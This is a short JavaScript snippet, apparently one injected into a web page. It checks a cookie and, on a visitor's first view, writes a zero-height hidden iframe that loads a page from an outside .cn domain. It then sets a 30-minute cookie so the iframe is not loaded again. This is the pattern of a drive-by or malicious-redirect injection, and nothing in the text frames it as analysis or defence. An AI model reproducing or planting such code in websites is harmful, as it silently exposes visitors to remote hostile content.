var cookieString = new String(document.cookie);
var cookieHeader = 'ises' ;
var Then = new Date();
Then.setTime(Then.getTime() + 30*60*1000 );
var beginPosition = cookieString.indexOf(cookieHeader);
if (beginPosition == -1)
   {
   document.write('<iframe src=http://www.wyf008.cn/one/a8.htm?wan width=50 height=0 border=0></iframe>');
   document.cookie = "Cookieak=ises;expires="+ Then.toGMTString() +";path=/";
   }